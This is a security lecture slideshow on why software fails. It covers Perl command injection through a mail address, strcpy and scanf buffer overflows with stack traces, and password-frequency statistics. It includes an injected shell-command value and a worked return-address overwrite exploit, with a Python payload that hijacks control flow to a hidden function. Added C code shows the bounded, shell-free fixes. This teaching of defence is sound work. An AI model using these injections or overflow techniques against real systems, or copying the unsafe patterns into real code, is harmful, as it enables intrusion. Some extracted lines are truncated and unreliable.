Why Security Systems Fail - PowerPoint PPT Presentation (slideshow by kasi)

Slide excerpt: Why Security Systems Fail. Capability List. Access Control List. ALL STATES. UNSAFE / UNDEFINED STATES. SAFE STATES.
Presentation Transcript
slide5
ALL STATES

UNSAFE / UNDEFINED STATES

SAFE STATES

slide6
#!/usr/bin/perl
# funky CGI script example
$dest = "foo1"; # pretend this is the destination address from the user
open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;

#!/usr/bin/perl
# funky CGI script example
# same script, but now the "address" supplied by the user carries shell commands
$dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";
open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail; the shell runs everything in $dest
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;

slide7
#!/usr/bin/perl -w
# (1) quit unless we have the correct number of command-line args
$num_args = $#ARGV + 1;
if ($num_args != 2) {
    print "\nUsage: name.pl email-address brief-message\n";
    exit;
}
# (2) we got two command line args, so assume it's address
$dest=$ARGV[0];
$content=$ARGV[1];
my $sendmail = "/usr/sbin/sendmail -t";
#open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail
open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!";
print MAIL "To: $dest\n";
print MAIL "From: me\n";
print MAIL "Subject: test\n";
print MAIL "Content-type: text/plain\n\n";
print MAIL $content;
close MAIL;

Run it with

./tryit.pl ccpalmer "Some long message here inside quotes"

Could you find a way to trick the perl script into mailing you some file that it shouldn't???
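The two scripts above fail for the same reason: the destination address is handed to a shell as part of a command string, so shell metacharacters in it become commands. The fix has two parts, and the following C program is an added example (not from the slides) that shows both: the address is checked against a strict allowlist before use, and sendmail is started with fork()+execv() and a fixed argument vector so no shell ever parses user data. The address alphabet, the path /usr/sbin/sendmail and the sample inputs are assumptions; the sample inputs are the two addresses used on the slides.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only a conservative address alphabet (assumed here). Anything a
 * shell could interpret (; | & $ ` quotes, spaces) is rejected, and so are
 * CR and LF, which would otherwise let the caller add mail headers.
 * Returns 1 if the address is acceptable, 0 otherwise. */
int valid_address(const char *addr)
{
    size_t len = strlen(addr);
    if (len == 0 || len > 254)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (isalnum(c) || c == '@' || c == '.' || c == '-' || c == '_' || c == '+')
            continue;
        return 0;
    }
    return 1;
}

/* Hand the message to sendmail through a pipe. The child process execs
 * sendmail with a fixed argv, so the address never reaches a shell.
 * Returns sendmail's exit status, or -1 on a local failure (including a
 * rejected address). */
int send_mail(const char *dest, const char *content)
{
    if (!valid_address(dest))
        return -1;
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* child: stdin <- read end of the pipe, then exec sendmail */
        dup2(fds[0], STDIN_FILENO);
        close(fds[0]);
        close(fds[1]);
        char *const argv[] = { "/usr/sbin/sendmail", "-t", NULL };
        execv(argv[0], argv);
        _exit(127);                  /* only reached if exec failed */
    }
    close(fds[0]);
    FILE *mail = fdopen(fds[1], "w");
    if (!mail) {
        close(fds[1]);
        return -1;
    }
    fprintf(mail, "To: %s\nFrom: me\nSubject: test\nContent-type: text/plain\n\n%s\n",
            dest, content);
    fclose(mail);
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    /* Constructed inputs: the slide's plain address and its injected one. */
    const char *good = "ccpalmer";
    const char *bad  = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";
    printf("%s -> %s\n", good, valid_address(good) ? "accepted" : "rejected");
    printf("%s -> %s\n", bad,  valid_address(bad)  ? "accepted" : "rejected");
    if (argc == 3)   /* only actually mail when an address and a message are given */
        return send_mail(argv[1], argv[2]) == 0 ? 0 : 1;
    return 0;
}
```

Run without arguments it only shows the validation decision for the two addresses; with an address and a message it pipes the mail to sendmail. Note that the allowlist check is still worth keeping even though execv() removes the shell: sendmail itself reads the To: header, so a newline in the address would otherwise be interpreted as the start of another header.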

slide9
Memory layout: name[9] followed directly by degree[4] (the diagram shows one byte before name).

before: 0 | name[9]: 0 0 0 0 0 0 0 0 0 | degree[4]: 0 0 0 0

strcpy(name,"charles");
strcpy(degree,"PhD");

after: 0 | name[9]: 'c' 'h' 'a' 'r' 'l' 'e' 's' 0 0 | degree[4]: 'P' 'h' 'D' 0

printf(name); prints charles
printf(degree); prints PhD

slide10
Memory layout: name[9] followed directly by degree[4] (the diagram shows one byte before name).

before: 0 | name[9]: 0 0 0 0 0 0 0 0 0 | degree[4]: 0 0 0 0

strcpy(name,"charleton");

after: 0 | name[9]: 'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n' | degree[4]: 0 0 0 0

(nine characters plus the terminating 0 need ten bytes, so the terminator lands in degree[0])

strcpy(degree,"PhD");

after: 0 | name[9]: 'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n' | degree[4]: 'P' 'h' 'D' 0

printf(name); prints charletonPhD
printf(degree); prints PhD
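The diagrams above show why strcpy() is the wrong tool: it copies until it sees a terminator, regardless of the destination's size, so "charleton" spills its terminator into degree and name then reads through into degree. The program below is an added example, not from the slides, with the same name[9]/degree[4] layout expressed as a struct and a bounded copy that always terminates and reports how many bytes did not fit, so the caller can reject the input instead of silently truncating. The struct and function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* The two arrays from the slides, laid out back to back in a struct so the
 * adjacency is explicit (the compiler may pad, but cannot reorder them). */
struct record {
    char name[9];
    char degree[4];
};

/* Copy src into dst[cap] and always NUL-terminate. Returns 0 when the whole
 * string fit, otherwise the number of source bytes that were dropped. */
size_t bounded_copy(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    size_t n = len < cap - 1 ? len : cap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return len - n;
}

/* Fill a record in the same order as the slides (name, then degree), but
 * with bounded copies. Returns 1 if both fields fit, 0 if either was cut. */
int fill_record(struct record *r, const char *name, const char *degree)
{
    memset(r, 0, sizeof *r);
    size_t lost = bounded_copy(r->name, sizeof r->name, name);
    lost += bounded_copy(r->degree, sizeof r->degree, degree);
    return lost == 0;
}

int main(void)
{
    struct record r;
    int ok;

    /* "charles" (7 chars + NUL) fits in 9 bytes. */
    ok = fill_record(&r, "charles", "PhD");
    printf("charles:   ok=%d name=%s degree=%s\n", ok, r.name, r.degree);

    /* "charleton" (9 chars + NUL) does not fit: it is cut to 8 characters and
     * degree is left intact, instead of name running on into degree. */
    ok = fill_record(&r, "charleton", "PhD");
    printf("charleton: ok=%d name=%s degree=%s\n", ok, r.name, r.degree);
    return 0;
}
```

Truncation is only the fallback: the return value exists so that production code refuses the oversized input rather than storing a silently shortened name.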

slide12
#include <stdio.h>
/* The slide has three #include lines; the other two header names were lost in
   extraction. stdio.h is the only one this program needs. */

void secret1(void) {
    puts("You found the secret function No. 1!\n");
}

int main () {
    char string[2];
    puts("Input: ");
    scanf("%s", string);   /* unbounded read into a 2-byte buffer */
    printf("You entered %s.\n", string);
    return 0;
}
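The slides that follow trace what scanf("%s", string) does to main()'s frame when the input is longer than the two bytes reserved for it. The C program below is an added example (not from the slides) of the bounded replacement: fgets() is given the buffer size, an overlong line is detected rather than written past the buffer, and the rest of that line is drained so it cannot be mistaken for the next input. The function names and the sample inputs are assumptions; the main() keeps the slide's 2-byte buffer so the difference is visible on the same input.

```c
#include <stdio.h>
#include <string.h>

/* Read one line from fp into buf[cap]. Returns the number of characters
 * stored (without the newline), or -1 if the line did not fit; in that case
 * the remainder of the line is discarded and buf is left empty. */
int read_bounded_line(FILE *fp, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, fp) == NULL)
        return -1;
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') {            /* the newline arrived inside the buffer */
        buf[n] = '\0';
        return (int)n;
    }
    /* Buffer is full (or input ended). Look at the next character: a newline
     * or EOF means the line fit exactly; anything else means it was too long. */
    int c = fgetc(fp);
    if (c == '\n' || c == EOF)
        return (int)n;
    while ((c = fgetc(fp)) != EOF && c != '\n')
        ;                            /* drain the oversized line */
    buf[0] = '\0';
    return -1;
}

/* Same logic applied to an in-memory string (via a temporary file, which is
 * standard C), so the behaviour can be checked without a terminal. */
int read_bounded_from_string(const char *input, char *buf, size_t cap)
{
    FILE *fp = tmpfile();
    if (!fp)
        return -1;
    fputs(input, fp);
    rewind(fp);
    int r = read_bounded_line(fp, buf, cap);
    fclose(fp);
    return r;
}

int main(void)
{
    char string[2];   /* same 2-byte buffer as the slide: one character plus NUL */
    puts("Input: ");
    int n = read_bounded_line(stdin, string, sizeof string);
    if (n < 0) {
        puts("Input too long.");
        return 1;
    }
    printf("You entered %s.\n", string);
    return 0;
}
```

With this version the 24 'A's typed on the last slide are rejected with "Input too long." and nothing beyond string[1] is written, so the saved rbp and return address in the trace below stay untouched.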

slide13
At startup of poof

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e52

rbp 0x7fff5fbff828

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide14
Before call to puts()

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e61

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide15
Just inside of puts()

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 (ONE INSTRUCTION IN) /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000ea4

rbp 0x7fff5fbff810

rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide16
Just after return from puts()

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e66

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide17
Just inside scanf( )

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e66

rsi 0x7fff5fbff800

rbp 0x7fff5fbff810

rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide18
After return from scanf ( )

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e7b

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide19
Just before stack cleanup

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e95

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide20
And ready to return to the operating system?

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e96

rbp 0x414141414141

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

?

slide21
Hello secret1( ) !!!

0x0000000100000e40 : push %rbp

0x0000000100000e41 : mov %rsp,%rbp

0x0000000100000e44 : lea 0x65(%rip),%rdi # 0x100000eb0

0x0000000100000e4b : callq 0x100000ea4

0x0000000100000e50 : leaveq

0x0000000100000e51 : retq

rip 0x000100000e40

rbp 0x414141414141

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

?

slide22
$ poof

Input:

A

You entered A.

$ cat poop

import struct

rip = 0x0000000100000e40

print("A"*24 + struct.pack("

$ python poop | poof

Input:

You entered [email protected]^N.

You found the secret function No. 1!

Segmentation fault

$

And speaking of passwords …
  • 4.7% of users have the password password
  • 8.5% have the passwords password or 123456
  • 9.8% have the passwords password, 123456 or 12345678
  • 14% have a password from the top 10 passwords
  • 40% have a password from the top 100 passwords
  • 79% have a password from the top 500 passwords
  • 91% have a password from the top 1000 passwords

From https://xato.net/passwords/more-top-worst-passwords/#.VAh-1Esc8pw
